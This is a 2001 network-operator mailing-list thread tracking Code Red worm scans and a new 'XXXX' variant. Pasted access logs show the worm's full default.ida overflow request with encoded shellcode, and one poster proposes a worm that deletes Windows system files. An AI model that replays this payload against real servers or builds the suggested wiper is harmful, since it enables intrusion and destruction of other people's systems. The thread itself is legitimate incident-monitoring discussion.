My little Class C seems to be getting 3-6 attempts per second to
connect to Port 80 on various IPs at the present time. Is this
about average?
-=[L]=-
Hello Lou,
Its more than what I am getting. Never the less since this started again
im seeing alot more attempts than in July.
Michael...
Yes, it's true, I fixed the attribution. Young whippersnappers!
michael@aplatform.com wrote:
> My little Class C seems to be getting 3-6 attempts per second to
> connect to Port 80 on various IPs at the present time. Is this
> about average?
Its more than what I am getting. Never the less since this started again
im seeing alot more attempts than in July.
I see about 300% more attempts than in July, but close to one-third of
those do not appear to be code red. They seem to be what I would have
suspected. People trying to mask attempts under the noise of code red.
Nonetheless, it is getting annoying enough that I am close to moving all
the windoze machines off to a private switched network until this is over.
No, I'm not afraid of them being compromised, but some of them do seem to
be getting hit harder than the rest of my computers. What I don't
understand is why my openbsd laptop attracts so much attention.
Uname -a shows OpenBSD scorpion 2.6 GENERIC#696 i386, hardly an attractive
target for code red in my book. No, it's not running a web server. The only
service it actually offers is sshd.
At first it was interesting, then annoying, now it's just boring. Most of
the non-code red attempts I see are from apnic, for what that's worth.
Hello Etaoin,
Yes, it's true, I fixed the attribution. Young whippersnappers!
>
> > My little Class C seems to be getting 3-6 attempts per second to
> > connect to Port 80 on various IPs at the present time. Is this
> > about average?> Its more than what I am getting. Never the less since this started again
> im seeing alot more attempts than in July.I see about 300% more attempts than in July, but close to one-third of
those do not appear to be code red. They seem to be what I would have
suspected. People trying to mask attempts under the noise of code red.
Nonetheless, it is getting annoying enough that I am close to moving all
the windoze machines off to a private switched network until this is over.
I can see they are "valid" CR attempts..
I also noticed requests that use "XXXXXXXXX" instead of "NNNNNNNNNN". In
fact I see more X's than N's as of this morning.
Grisha
Hello,
Very interesting. Im seeing the NNNNNNNNNNNNNNNNNNNN's as it was in July.
Michael...
N's versus X's on a server with a block of 5 IP's as of August 1, 4AM EDT:
4:53:42pm|melange@host:/home/melange> grep default.ida /var/log/httpd-access.log | grep NNNNN|wc -l
436
4:53:48pm|melange@host:/home/melange> grep default.ida /var/log/httpd-access.log | grep XXXXX | wc -l
6
Bob,
I guess they will get around to me as I dont show any XXX. Only a hundred
or so NNNN.
Michael...
I've started seeing LOTS of XXXXX hits as of approx 1 hour ago.
5 in one hour and counting...
Checking back the first XXXX one I saw was about 9 hours ago, since then
the number of XXXX and NNNN accesses has been about even. Actually
checking other logs I would say XXX accesses are the majority (over 80%)
in the last 4 or 5 hours.
I would guess a better version, perhaps it deletes the old Code Red copy
when it infects a machine which enables it to grow so fast.
Just for reference, here's the logs of this new variant:
211.194.55.233 - - [04/Aug/2001:11:52:42 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281 "-" "-"
213.57.146.75 - - [04/Aug/2001:14:38:06 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 282 "-" "-"
202.110.201.18 - - [04/Aug/2001:14:46:37 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 273 "-" "-"
200.203.173.193 - - [04/Aug/2001:15:25:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276 "-" "-"
user-v3qslgs.biz.mindspring.com - - [04/Aug/2001:15:40:06 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276 "-" "-"
202.106.106.190 - - [04/Aug/2001:15:57:10 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 735 "-" "-"
Note that the earliest one hit at 11:52 today...
Le (On) Sat, Aug 04, 2001 at 05:14:09PM -0400, Bob K ecrivit (wrote):
> > 4:53:48pm|melange@host:/home/melange> grep default.ida /var/log/httpd-access.log | grep XXXXX | wc -l
> > 6
>
> I've started seeing LOTS of XXXXX hits as of approx 1 hour ago.
> 5 in one hour and counting...Just for reference, here's the logs of this new variant:
Pretty interesting, maybe all nanog-post subscribers could share their
experience with this worm too. Especially if you've seen a lot of non-[XN]
alphanumerical chars.
Sorry, but this worm caused more damages to mailing lists than anything
else, on the Internet. Looks more like a chain-letter...
Speaking of sharing experiances it is beating the crap out of our unix
servers we install aplicatino firewalls on all the NT machines and there were
patched anyway before the last one hit. But all the requestes to the port 80
is taking down the webserver and affecting the machine because of access
logs.
bummer. 
Yup Im seeing the XXXX's now. :((
Another round??
Michael...
Sameh Ghane wrote:
Sorry, but this worm caused more damages to mailing lists than anything
else, on the Internet. Looks more like a chain-letter...
Dunno why you would think this was other than operational. As a small
provider serving almost entirely dial-up, we still have enough of this
to swamp almost entirely all of our outbound links. And as soon as
we kill them, they pop up on another IP. The support costs are going
to hurt, bad.
Inbound isn't too bad, I guess CEF and WFQ works to protect individual
machines from overload at T1 rates.
We won't have much of an attack problem on our own machines, as we are
a Macintosh/Linux/OpenBSD shop. We have only 2 Windows machines to
train tech support....
Meanwhile, the SirCam worm is eating disk space, and we have folks
calling because it takes too long to download their mail, or the POP
session fails entirely (another M$ problem with large messages).
The support costs are hurting on this, too.
It seems to me that somebody needs to write a version of Code Red that
wipes all .exe and .dll in the windows directory, forcing an update
of both windows and office.
Anybody game?
I've got 18 with XXXXX's and 38 with NNNNNNN's, and that was with my web
server down for part of the day.
Regards,